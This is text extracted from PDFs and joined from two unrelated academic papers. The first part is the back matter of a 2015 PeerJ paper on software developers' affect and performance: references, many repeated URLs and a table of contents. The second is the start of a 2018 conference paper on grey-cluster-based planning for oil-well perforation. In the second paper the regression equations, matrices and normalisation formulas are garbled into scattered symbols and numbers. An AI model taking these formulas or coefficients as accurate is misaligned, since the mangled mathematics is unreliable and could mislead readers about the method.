well-being. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 25/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 ACKNOWLEDGEMENTS We thank our two participants, who openly, actively, and unhesitatingly collaborated during the research activities. We are grateful for the feedback provided by two anonymous reviewers, which let us improve the manuscript in terms of several aspects including clarity. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Daniel Graziotin conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Xiaofeng Wang performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • Pekka Abrahamsson analyzed the data, wrote the paper, reviewed drafts of the paper. REFERENCES Abrahamsson P. 2001. Rethinking the concept of commitment in software process improvement. Scandinavian Journal of Information Systems 13(1):35–59. Amabile T. 1996. Creativity and innovation in organizations. In: Harvard business school background, pages Note 396–239. Amabile T, Barsade SG, Mueller JS, Staw BM. 2005. Affect and creativity at work. Administrative Science Quarterly 50(3):367–403 DOI 10.2189/asqu.2005.50.3.367. Barsade SG, Gibson DE. 1998. Group emotion: a view from top and bottom. Research on Managing Groups and Teams 1(4):81–102. Barsade SG, Gibson DE. 2007. Why does affect matter in organizations? Academy of Management Perspectives 21(1):36–59 DOI 10.5465/AMP.2007.24286163. Beal DJ, Weiss HM, Barros E, MacDermid SM. 2005. An episodic process model of affective influences on performance. The Journal of Applied Psychology 90(6):1054–1068 DOI 10.1037/0021-9010.90.6.1054. Beedie C, Terry P, Lane A. 2005. Distinctions between emotion and mood. Cognition & Emotion 19(6):847–878 DOI 10.1080/02699930541000057. Bendassolli PF. 2013. Theory building in qualitative research: reconsidering the problem of induction. Forum Qualitative Sozialforschung/Forum: Qualitative Social Research 14(1): Part I. Berander P. 2004. Using students as subjects in requirements prioritization. In: Proceedings 2004 international symposium on empirical software engineering 2004 (ISESE 2004). Piscataway: IEEE, 167–176. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 26/31 https://peerj.com/computer-science/ http://dx.doi.org/10.2189/asqu.2005.50.3.367 http://dx.doi.org/10.5465/AMP.2007.24286163 http://dx.doi.org/10.1037/0021-9010.90.6.1054 http://dx.doi.org/10.1080/02699930541000057 http://dx.doi.org/10.7717/peerj-cs.18 Bradley MM, Lang PJ. 1994. Measuring emotion: the self-assessment manikin and the semantic differential. Journal of Behavior Therapy and Experimental Psychiatry 25(1):49–59 DOI 10.1016/0005-7916(94)90063-9. Brief AP, Weiss HM. 2002. Organizational behavior: affect in the workplace. Annual Review of Psychology 53:279–307 DOI 10.1146/annurev.psych.53.100901.135156. Charmaz K. 2006. Constructing grounded theory: a practical guide through qualitative analysis. Introducing qualitative methods, 1st edition, vol. 10. London: Sage Publications. Ciborra C. 2002. The Labyrinths of information: challenging the wisdom of systems. 1st edition. New York: Oxford University Press. Clutterbuck D. 2010. Coaching reflection: the liberated coach. Coaching: an International Journal of Theory, Research and Practice 3(2):73–81 DOI 10.1080/17521880903102308. Corbin JM, Strauss AL. 2008. Basics of qualitative research: techniques and procedures for developing grounded theory. 3rd edition, vol. 2. London: Sage Publications. Creswell JW. 2009. Research design: qualitative, quantitative, and mixed method approaches. 3rd edition, vol. 2. Thousand Oaks: Sage Publications. Csikszentmihalyi M. 1997. Finding flow: the psychology of engagement with everyday life. 1st edition, vol. 30. New York: Basic Books. De Dreu CKW, Nijstad BA, Bechtoldt MN, Baas M. 2011. Group creativity and innovation: a motivated information processing perspective. Psychology of Aesthetics, Creativity, and the Arts 5(1):81–89 DOI 10.1037/a0017986. Diener E, Wirtz D, Tov W, Kim-Prieto C, Choi D, Oishi S, Biswas-Diener R. 2009. New well-being measures: short scales to assess flourishing and positive and negative feelings. Social Indicators Research 97(2):143–156 DOI 10.1007/s11205-009-9493-y. Easterbrook S, Singer J, Storey M-A, Damian D. 2008. Selecting empirical methods for software engineering research. In: Shull F, Singer J, Sjøberg DIK, eds. Guide to advanced empirical software engineering. London: Springer-Verlag, 285–311 DOI 10.1007/978-1-84800-044-5 11. Eisenhardt K. 1989. Building theories from case study research. Academy of Management Review 14(4):532–550. Fagerholm F, Ikonen M, Kettunen P, Münch J, Roto V, Abrahamsson P. 2015. Performance Alignment Work: how software developers experience the continuous adaptation of team performance in Lean and Agile environments. Information and Software Technology 64:132–147 DOI 10.1016/j.infsof.2015.01.010. Feldt R, Angelis L, Torkar R, Samuelsson M. 2010. Links between the personalities, views and attitudes of software engineers. Information and Software Technology 52(6):611–624 DOI 10.1016/j.infsof.2010.01.001. Feldt R, Torkar R, Angelis L, Samuelsson M. 2008. Towards individualized software engineering. In: Proceedings of the 2008 international workshop on Cooperative and human aspects of software engineering (CHASE ’08). New York: ACM Press, 49–52. Fischer G. 1987. Cognitive view of reuse and redesign. IEEE Software 4(4):60–72 DOI 10.1109/MS.1987.231065. Fisher CD. 2000. Mood and emotions while working: missing pieces of job satisfaction? Journal of Organizational Behavior 21(2):185–202 DOI 10.1002/(SICI)1099-1379(200003)21:2<185::AID-JOB34>3.0.CO;2-M. Fisher CD, Ashkanasy NM. 2000. The emerging role of emotions in work life: an introduction. Journal of Organizational Behavior 21(2):123–129 DOI 10.1002/(SICI)1099-1379(200003)21:2<123::AID-JOB33>3.0.CO;2-8. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 27/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/0005-7916(94)90063-9 http://dx.doi.org/10.1146/annurev.psych.53.100901.135156 http://dx.doi.org/10.1080/17521880903102308 http://dx.doi.org/10.1037/a0017986 http://dx.doi.org/10.1007/s11205-009-9493-y http://dx.doi.org/10.1007/978-1-84800-044-5_11 http://dx.doi.org/10.1016/j.infsof.2015.01.010 http://dx.doi.org/10.1016/j.infsof.2010.01.001 http://dx.doi.org/10.1109/MS.1987.231065 http://dx.doi.org/10.1002/(SICI)1099-1379(200003)21:2%3C185::AID-JOB34%3E3.0.CO;2-M http://dx.doi.org/10.1002/(SICI)1099-1379(200003)21:2%3C123::AID-JOB33%3E3.0.CO;2-8 http://dx.doi.org/10.7717/peerj-cs.18 Flores F. 1998. Information technology and the institution of identity. Information Technology & People 11(4):351–372 DOI 10.1108/09593849810246156. Franke RH, Kaul JD. 1978. The hawthorne experiments: first statistical interpretation. American Sociological Review 43(5):623–643 DOI 10.2307/2094540. Gardener EKT, Carr AR, MacGregor A, Felmingham KL. 2013. Sex differences and emotion regulation: an event-related potential study. PLoS ONE 8(10):e73475 DOI 10.1371/journal.pone.0073475. Geertz C. 1973. The interpretation of cultures: selected essays. Vol. 1. New York: Basic Books. Glaser BG. 1978. Theoretical sensitivity: advances in the methodology of grounded theory. Mill Valley: The Sociology Press. Glaser BG, Strauss AL. 1967. The discovery of grounded theory: strategies for qualitative research. Chicago: Aldine. Graziotin D, Wang X, Abrahamsson P. 2014a. Happy software developers solve problems better: psychological measurements in empirical software engineering. PeerJ 2(1):e289 DOI 10.7717/peerj.289. Graziotin D, Wang X, Abrahamsson P. 2014b. Software developers, moods, emotions, and performance. IEEE Software 31(4):24–27 DOI 10.1109/MS.2014.94. Graziotin D, Wang X, Abrahamsson P. 2015a. Do feelings matter? On the correlation of affects and the self-assessed productivity in software engineering. Journal of Software: Evolution and Process 27(7):467–487 DOI 10.1002/smr.1673. Graziotin D, Wang X, Abrahamsson P. 2015b. The Affect of software developers: common misconceptions and measurements. In: 2015 IEEE/ACM 8th international workshop on cooperative and human aspects of software engineering, Firenze, Italy. Piscataway: IEEE Computer Society, 123–124 DOI 10.1109/CHASE.2015.23. Graziotin D, Wang X, Abrahamsson P. 2015c. Understanding the affect of developers: theoretical background and guidelines for psychoempirical software engineering. In: 7th international workshop on social software engineering (SSE 2015), Bergamo, Italy. Available at http://arxiv.org/ abs/1507.03767. Gregor S. 2006. The nature of theory in information systems. MIS Quarterly 30(3):611–642. Harris AD, McGregor JC, Perencevich EN, Furuno JP, Zhu J, Peterson DE, Finkelstein J. 2006. The use and interpretation of quasi-experimental studies in medical informatics. Journal of the American Medical Informatics Association 13(1):16–23 DOI 10.1197/jamia.M1749. Haybron DM. 2001. Happiness and pleasure. Philosophy and Phenomenological Research 62(3):501–528 DOI 10.1111/j.1933-1592.2001.tb00072.x. Haybron DM. 2005. On being happy or unhappy. Philosophy and Phenomenological Research 71(2):287–317 DOI 10.1111/j.1933-1592.2005.tb00450.x. Haybron DM. 2007. Do we know how happy we are? On some limits of affective introspection and recall. Nous 41(3):394–428 DOI 10.1111/j.1468-0068.2007.00653.x. Heath H, Cowley S. 2004. Developing a grounded theory approach: a comparison of Glaser and Strauss. International Journal of Nursing Studies 41(2):141–150 DOI 10.1016/S0020-7489(03)00113-5. Höst M, Regnell B, Wohlin C. 2000. Using students as subjects—a comparative study of students and professionals in lead-time impact assessment. Empirical Software Engineering 5(3):201–214 DOI 10.1023/A:1026586415054. Järvinen P. 2012. On research methods. 1st edition. Tampere: Opinpajan Kirja. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 28/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1108/09593849810246156 http://dx.doi.org/10.2307/2094540 http://dx.doi.org/10.1371/journal.pone.0073475 http://dx.doi.org/10.7717/peerj.289 http://dx.doi.org/10.1109/MS.2014.94 http://dx.doi.org/10.1002/smr.1673 http://dx.doi.org/10.1109/CHASE.2015.23 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://arxiv.org/abs/1507.03767 http://dx.doi.org/10.1197/jamia.M1749 http://dx.doi.org/10.1111/j.1933-1592.2001.tb00072.x http://dx.doi.org/10.1111/j.1933-1592.2005.tb00450.x http://dx.doi.org/10.1111/j.1468-0068.2007.00653.x http://dx.doi.org/10.1016/S0020-7489(03)00113-5 http://dx.doi.org/10.1023/A:1026586415054 http://dx.doi.org/10.7717/peerj-cs.18 Johnson P, Ekstedt M, Jacobson I. 2012. Where’s the theory for software engineering? IEEE Software 29(5):92–95 DOI 10.1109/MS.2012.127. Kasurinen J, Laine R, Smolander K. 2013. How applicable Is ISO/IEC 29110 in game software development? In: Heidrich J, Oivo M, Jedlitschka A, Baldassarre MT, eds. 14th international conference on product-focused software process improvement (PROFES 2013), Lecture notes in computer science, vol. 7983. Berlin Heidelberg: Springer, 5–19. Khan IA, Brinkman W, Hierons RM. 2010. Do moods affect programmers’ debug performance? Cognition, Technology & Work 13(4):245–258 DOI 10.1007/s10111-010-0164-1. Kitchenham BA, Pfleeger SL, Pickard LM, Jones PW, Hoaglin DC, Emam KE, Rosenberg J. 2002. Preliminary guidelines for empirical research in software engineering. IEEE Transactions on Software Engineering 28(8):721–734 DOI 10.1109/TSE.2002.1027796. Klein HK, Myers MD. 1999. A set of principles for conducting and evaluating interpretive field studies in information systems. MIS Quarterly 23:67–93 DOI 10.2307/249410. Kleinginna PR, Kleinginna AM. 1981. A categorized list of emotion definitions, with suggestions for a consensual definition. Motivation and Emotion 5:345–379 DOI 10.1007/BF00992553. Langley A. 1999. Strategies for theorizing from process data. The Academy of Management Review 24(4):691–710 DOI 10.2307/259349. Lenberg P, Feldt R, Wallgren L-G. 2014. Towards a behavioral software engineering. In: Proceedings of the 7th international workshop on cooperative and human aspects of software engineering (CHASE 2014). New York: ACM Press, 48–55. Lenberg P, Feldt R, Wallgren LG. 2015. Behavioral software engineering: a definition and system- atic literature review. Journal of Systems and Software 107:15–37 DOI 10.1016/j.jss.2015.04.084. Lesiuk T. 2005. The effect of music listening on work performance. Psychology of Music 33(2):173–191 DOI 10.1177/0305735605050650. Lewin K. 1945. The research center for group dynamics at Massachusetts institute of technology. Sociometry 8(2):126–136 DOI 10.2307/2785233. Locke EA. 1968. Toward a theory of task motivation and incentives. Organizational Behavior and Human Performance 3(2):157–189 DOI 10.1016/0030-5073(68)90004-4. Locke EA, Latham GP. 2006. New directions in goal-setting theory. Current Directions in Psychological Science 15:265–268 DOI 10.1111/j.1467-8721.2006.00449.x. Lyubomirsky S, King L, Diener E. 2005. The benefits of frequent positive affect: does happiness lead to success? Psychological Bulletin 131(6):803–855 DOI 10.1037/0033-2909.131.6.803. McRae K, Ochsner KN, Mauss IB, Gabrieli JJD, Gross JJ. 2008. Gender differences in emotion regulation: an fMRI study of cognitive reappraisal. Group Processes & Intergroup Relations 11(2):143–162 DOI 10.1177/1368430207088035. Meyer AN, Fritz T, Murphy GC, Zimmermann T. 2014. Software developers’ perceptions of productivity. In: Proceedings of the 22nd ACM SIGSOFT international symposium on foundations of software engineering (FSE 2014). New York: ACM Press, 19–29 DOI 10.1145/2635868.2635892. Miner AG, Glomb TM. 2010. State mood, task performance, and behavior at work: a within-persons approach. Organizational Behavior and Human Decision Processes 112(1):43–57 DOI 10.1016/j.obhdp.2009.11.009. Mohr LB. 1982. Explaining organizational behavior. San Francisco: Jossey-Bass Inc. Muchinsky PM. 2000. Emotions in the workplace: the neglect of organizational behavior. Journal of Organizational Behavior 21(7):801–805 DOI 10.1002/1099-1379(200011)21:7<801::AID-JOB999>3.0.CO;2-A. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 29/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1109/MS.2012.127 http://dx.doi.org/10.1007/s10111-010-0164-1 http://dx.doi.org/10.1109/TSE.2002.1027796 http://dx.doi.org/10.2307/249410 http://dx.doi.org/10.1007/BF00992553 http://dx.doi.org/10.2307/259349 http://dx.doi.org/10.1016/j.jss.2015.04.084 http://dx.doi.org/10.1177/0305735605050650 http://dx.doi.org/10.2307/2785233 http://dx.doi.org/10.1016/0030-5073(68)90004-4 http://dx.doi.org/10.1111/j.1467-8721.2006.00449.x http://dx.doi.org/10.1037/0033-2909.131.6.803 http://dx.doi.org/10.1177/1368430207088035 http://dx.doi.org/10.1145/2635868.2635892 http://dx.doi.org/10.1016/j.obhdp.2009.11.009 http://dx.doi.org/10.1002/1099-1379(200011)21:7%3C801::AID-JOB999%3E3.0.CO;2-A http://dx.doi.org/10.7717/peerj-cs.18 Müller SC, Fritz T. 2015. Stuck and frustrated or in flow and happy: sensing developers’ emotions and progress. In: 2015 IEEE/ACM 37th IEEE international conference on software engineering. Florence, Italy. Piscataway: IEEE, 688–699 DOI 10.1109/ICSE.2015.334. Nolen-Hoeksema S. 2012. Emotion regulation and psychopathology: the role of gender. Annual Review of Clinical Psychology 8(1):161–187 DOI 10.1146/annurev-clinpsy-032511-143109. Nolen-Hoeksema S, Aldao A. 2011. Gender and age differences in emotion regulation strategies and their relationship to depressive symptoms. Personality and Individual Differences 51(6):704–708 DOI 10.1016/j.paid.2011.06.012. OED Online. 2015. vision, n. Oxford: Oxford University Press. Available at http://www.oed.com/ view/Entry/223943. Ortony A, Clore GL, Collins A. 1990. The cognitive structure of emotions. 1st edition. New York: Cambridge University Press. Osterweil L, Ghezzi C, Kramer J, Wolf A. 2008. Determining the impact of software engineering research on practice. Computer 41(March):39–49 DOI 10.1109/MC.2008.85. Parkinson B, Briner R, Reynolds S, Totterdell P. 1996. Changing moods: the psychology of mood and mood regulation. 1st edition. London: Addison-Wesley Longman. Petersen K. 2011. Measuring and predicting software productivity: a systematic map and review. Information and Software Technology 53(4):317–343 DOI 10.1016/j.infsof.2010.12.001. Pfeffer J. 1983. Reviewed Work: explaining organizational behavior. by Lawrence B. Mohr. Administrative Science Quarterly 28(2):321 DOI 10.2307/2392635. Plutchik R, Kellerman H. 1980. Emotion, theory, research, and experience. Vol. 1. London: Academic Press. Rindova V. 2008. Editor’s comments: publishing theory when you are new to the game. Academy of Management Review 33(8):300–303 DOI 10.5465/AMR.2008.31193160. Runeson P. 2003. Using students as experiment subjects an analysis on graduate and freshmen student data. In: Proceedings 7th international conference on empirical assessment & evaluation in software engineering, 95–102. Russell JA. 1991. Culture and the categorization of emotions. Psychological Bulletin 110(3):426–450 DOI 10.1037/0033-2909.110.3.426. Russell JA. 2003. Core affect and the psychological construction of emotion. Psychological Review 110(1):145–172 DOI 10.1037/0033-295X.110.1.145. Russell JA. 2009. Emotion, core affect, and psychological construction. Cognition & Emotion 23(7):1259–1283 DOI 10.1080/02699930902809375. Russell JA, Barrett LF. 1999. Core affect, prototypical emotional episodes, and other things called emotion: dissecting the elephant. Journal of personality and social psychology 76(5):805–819 DOI 10.1037/0022-3514.76.5.805. Salman I, Misirli AT, Juristo N. 2015. Are students representatives of professionals in software engineering experiments? In: 2015 IEEE/ACM 37th IEEE international conference on software engineering. Florence, Italy. Piscataway: IEEE, 666–676 DOI 10.1109/ICSE.2015.82. Sampaio SCDB, Barros EA, Aquino jr GS, Silva MJC, Meira SRDL. 2010. A review of productivity factors and strategies on software development. In: 2010 fifth international conference on software engineering advances, 196–204. Schwarz N. 1990. Feelings as information: informational and motivational functions of affective states. In: Higgins ET, Sorrentino RM, eds. Handbook of motivation and cognition: foundations of social behavior, vol. 89. New York: Guilford Press, 527–561, Chapter 15. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 30/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1109/ICSE.2015.334 http://dx.doi.org/10.1146/annurev-clinpsy-032511-143109 http://dx.doi.org/10.1016/j.paid.2011.06.012 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://www.oed.com/view/Entry/223943 http://dx.doi.org/10.1109/MC.2008.85 http://dx.doi.org/10.1016/j.infsof.2010.12.001 http://dx.doi.org/10.2307/2392635 http://dx.doi.org/10.5465/AMR.2008.31193160 http://dx.doi.org/10.1037/0033-2909.110.3.426 http://dx.doi.org/10.1037/0033-295X.110.1.145 http://dx.doi.org/10.1080/02699930902809375 http://dx.doi.org/10.1037/0022-3514.76.5.805 http://dx.doi.org/10.1109/ICSE.2015.82 http://dx.doi.org/10.7717/peerj-cs.18 Schwarz N, Clore GL. 1983. Mood, misattribution, and judgments of well-being: informative and directive functions of affective states. Journal of Personality and Social Psychology 45(3):513–523 DOI 10.1037/0022-3514.45.3.513. Shockley KM, Ispas D, Rossi ME, Levine EL. 2012. A meta-analytic investigation of the relationship between state affect, discrete emotions, and job performance. Human Performance 25(5):377–411 DOI 10.1080/08959285.2012.721832. Squires A. 2009. Methodological challenges in cross-language qualitative research: a research review. International Journal of Nursing Studies 46(2):277–287 DOI 10.1016/j.ijnurstu.2008.08.006. Strauss A, Corbin J. 1994. Grounded theory methodology. In: Denzin NK, Lincoln YS, eds. Handbook of qualitative research. Thousand Oaks: SAGE Publications Inc, 273–285. Svahnberg M, Aurum A, Wohlin C. 2008. Using students as subjects—an empirical evaluation. In: Proceedings of the second ACM/IEEE international symposium on empirical software engineering and measurement. Piscataway: IEEE, 288–290. Tichy W. 2000. Hints for reviewing empirical work in software engineering. Empirical Software Engineering 5(4):309–312 DOI 10.1023/A:1009844119158. Van Nes F, Abma T, Jonsson H, Deeg D. 2010. Language differences in qualitative research: is meaning lost in translation? European Journal of Ageing 7(4):313–316 DOI 10.1007/s10433-010-0168-y. Wagner S, Ruhe M. 2008. A systematic review of productivity factors in software development. In: 2nd international workshop on software productivity analysis and cost estimation, (SPACE 2008). ISCAS–SKLCS–08–08, Beijing, China. Walsham G. 2006. Doing interpretive research. European Journal of Information Systems 15:320–330 DOI 10.1057/palgrave.ejis.3000589. Watson D, Clark LA, Tellegen A. 1988. Development and validation of brief measures of positive and negative affect: the PANAS scales. Journal of Personality and Social Psychology 54(6):1063–1070 DOI 10.1037/0022-3514.54.6.1063. Wegge J, Dick RV, Fisher GK, West MA, Dawson JF. 2006. A test of basic assumptions of affective events theory (AET) in call centre work. British Journal of Management 17(3):237–254 DOI 10.1111/j.1467-8551.2006.00489.x. Weick KE. 1995. What theory is not, theorizing is. Administrative Science Quarterly 40(3):385–390 DOI 10.2307/2393789. Weiss HM, Beal DJ. 2005. Reflections on affective events theory. In: Ashkanasy N, Zerbe W, Härtel C, eds. The effect of affect in organizational settings (research on emotion in organizations, Volume 1). 1st edition. Emerald Group Publishing Limited, 1–21, Chapter 1 DOI 10.1016/S1746-9791(05)01101-6. Weiss H, Cropanzano R. 1996. Affective events theory: a theoretical discussion of the structure, causes and consequences of affective experiences at work. Research in Organizational Behavior 18(1):1–74. Wrobel MR. 2013. Emotions in the software development process. In: 2013 6th international conference on human system interactions (HSI). Faculty of electronics, telecommunications and informatics, Gdansk University of Technology, Gdansk, Poland. Piscataway: IEEE, 518–523 DOI 10.1109/HSI.2013.6577875. Yeager LB. 2011. Henry George and Austrian economics. American Journal of Economics and Sociology 60(5):1–24 DOI 10.1111/1536-7150.00134. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 31/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1037/0022-3514.45.3.513 http://dx.doi.org/10.1080/08959285.2012.721832 http://dx.doi.org/10.1016/j.ijnurstu.2008.08.006 http://dx.doi.org/10.1023/A:1009844119158 http://dx.doi.org/10.1007/s10433-010-0168-y http://dx.doi.org/10.1057/palgrave.ejis.3000589 http://dx.doi.org/10.1037/0022-3514.54.6.1063 http://dx.doi.org/10.1111/j.1467-8551.2006.00489.x http://dx.doi.org/10.2307/2393789 http://dx.doi.org/10.1016/S1746-9791(05)01101-6 http://dx.doi.org/10.1109/HSI.2013.6577875 http://dx.doi.org/10.1111/1536-7150.00134 http://dx.doi.org/10.7717/peerj-cs.18 How do you feel, developer? An explanatory theory of the impact of affects on programming performance Introduction Background Affect, emotion, and mood Related work Theoretical framework Theory construction and representation Methodology Design Data analysis Reliability Results and Discussion Events Affects Attractors Interventions Focus---progressing and goal setting Performance Conclusion Contributions and implications Limitations Future work Acknowledgements References work_i3wjbqxpmjecda7wa6hds75oyy ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 86 A Research of Perforation Plan-decision Based on Grey Cluster Relation Xue Jijun Mechanical Engineering College Xi’an Shiyou University Xi’an, 710065, Shanxi, P.R.China e-mail: xue_jijun@163.com Abstract—Perforation completion in oil and gas wells is the most important way of completion engineering, the optimization of perforation completion’s designing is influenced by a variety of factors. In order to get the ideal effect of perforation operation, in this paper, a Perforation plan-decision based on Grey Cluster Relation is putted forward. It aims to provide a scientific guidance for the Perforation. The simulation experimental results show that new models are effective, which offer one kind of science decision-making foundation for petroleum Perforation. Keywords-Perforating Operation; Grey Cluster Relation; Perforation Plan-decision I. INTRODUCTION Perforated well completion As the most extensive and major method of the well’s completion, the reasonable selection of parameters for the program has great meaning of improving efficiency and reducing costs[1][2]. By establishing a quantitative regression model to study the relationship between the parameters of the perforation and the production ratio, this algorithm can also analysis how different factors (perforation elasticity, perforation penetration, shot density, perforation diameter, perforation phase angle) act on the production ratio and casing strength coefficient. It provides a reliable theoretical basis for the perforation parameter optimization, and gives different perforation completion optimization schemes [3]. Due to the mutual restriction of different parameters, the current subjective decision-making for perforation program can’t make all the factors to achieve the best at the same time. In order to solve the above problems and reduce the subjective influence of the decision maker, maximize the productivity ratio[4], a Perforation Plan-decision Based on Grey Cluster Relations proposed[5-7]. II. PERFORATION PLAN-DECISION BASED ON GREY CLUSTER RELATION Perforation optimization needs to confirm a solution to maximize the production capacity. This solution depends on many factors and the main influencing factors are hole depth, pore size, pore density, phase angle, formation heterogeneity, drilling pollution degree and depth, perforation compaction thickness and degree. All these factors are acting on the decision-making of the solution on the same time. Perforation Plan-decision based on Grey Cluster has made the model of perforation parameters and the oil well productivity. Gray parameters are clustered in the parameters of the perforation scheme, and the evaluation function is established to design the optimal scheme [8-10]. A. Building of model First simulating and calculating the productivity ratio of oil and gas, then making a non-linear regression analysis, According to whether perforation penetration penetrate the drilling zone or not, an equation can be established, it indicates the relationship between perforating parameters and capacity. 1) The regression equation when the perforation penetration does not penetrate the drilling zone: 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 87  2 2 2 2 PR=0.000156Y -0.000452 +0.000000205 +0.319 -0.103 -0.0009512 +0.000002378 2 2 2 -0.25+0.00148 -0.00000123 +0.00958 -0.0000998 -0.00467 lg( )+0.0178 -0.000296 2 +0.00195 -0.00001 -2* W W K K r r h h h zr zr w w K K K K X K K K s s m m w zr j j X X w w 2 2 0.000828 *lg( )+0.4 g( )+0.3488 -0.1745 +0.69 -0.35 -0.00778 X K l K Y Y W W w zr zr c c c c Y h  2) The regression equation that perforation penetration has penetrated the contaminated zone of drilling：  2 2 PR=-0.25+0.00191 -0.00000136 +0.01665 -0.000173 0.00856 lg(K )+0.0201 zr 2 2 2 -0.000335 +0.00211 -0.0000108 -0.001774 lg(K ) +0.5lg(K )+0.512 -0.253 zr zr 2 +0.3315 -0.168 -0.00963 +0.000193 K K K K K K s s m m m j K X X X Y Y cj w w w c W W Y Y c c h 2 2 2 -0.000841 +0.000000714 +0.406K -0.135K zr zr 2 -0.0009736 +0.00000243 W W h h h r r w w  The quantitative relationships between parameters (perforation penetration KS, perforation aperture Kj, perforation phase Xw, perforation compaction degree Yc, perforation compaction thickness Yh, drilling damage thickness Wh, drilling pollution degree Wc, shot density Km, borehole radius rw, formation permeability Kzr) and the oil production ratio PR is the basis for the optimization of perforating parameters. B. Perforation program base on Grey Cluster Relation The main factors in the decision-making of the perforation plan are six factors: perforation ratio, perforation phase angle, shot density, perforation penetration, perforation diameter and casing strength decreasing coefficient, which are expressed by attributes 1 x , 2 x , 3 x , 4 x , 5 x , 6 x respectively. Initial feature object matrix D is made like this: 11 12 13 1n 21 22 23 2 31 32 33 3 41 42 43 4 51 52 53 5 61 62 63 6 n n n n n x x x x x x x x x x x x D x x x x x x x x x x x x                              In the formula, ij x represents j th attribute of the ith scheme; in the j scheme 1 j x represents the productivity ratio, 2 j x is the phase angle, 3 j x is the perforation diameter, 4 j x is the hole depth, 5 j x is the aperture, and 6 j x is the casing strength reduction coefficient. There are n scheme and 6 attributes. As the different dimensions will have an impact on decision-making, so the formula (4) - (6) are used to D for normalization. The normalization of attribute data based on the different effects caused by different attributes, the formula (4) shows the method to normalize production ratio, which called upper limit method. Inherent properties such perforation phase angle, shot density, perforation penetration, perforation diameter are concluded by extreme conversion method, shown as formula (5). Casing strength decreasing coefficient, as a cost-type attribute, calculated by the lower limit method, shown as formula (6). 1j 1 1 max( ) j j x r x   max( ) min( ) ij ij ij ij x r x x    6 6 6 min( ) j j j x r x   2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 88 In the formula, 2 5,i j n   , the normalized decision matrix can be calculated: 6 n( ) ij R r  . The Grey Clustering analysis is used to classify the attributes and the similar factors can be classified and simplified. 1) Initialize processing： 1 2 5 ,      ij ij i r r r i j n  2) Calculate the gray absolute correlation degree ik  of any two parameter index data Ri and Rk sequence (1 ,1 6,k i j n    )： 1 2 1 n 2 | || 0.5 * | | || ( ) 0.5 *( )| 1 | | | | 1 | | | | | | n i ij in j n k i kj ij ij k in j i k ik i k i k S r r S S r r r r r S S S S S S                             3) Establishing attribute correlative sequence matrix according to the above gray absolute correlation degree: 12 13 14 15 16 23 24 25 26 34 35 36 45 46 56 1 1 1 1 1 1                                      The critical value  r 0,1 , in pursuit of accuracy the value of r is higher than 0.5, the higher the r value, the more accurate the classification is , and the accurate value of r is determined by actual data, the Ri and Rk classified as similar attributes; when ij  ≥ r. 4) Several attributes can be merged by the calculation above, and an attribute can be chosen to instead of other similar attributes. A new feature matrix D’ and new normalization matrix ' ， m n( ) ij R r  is established according to the Grey Clustering analysis, where m is the number of attributes and n is the number of schemes. 5) Computing information entropy iE and weight i  (1 ,i m j n   ): '' '' 1 ' '' 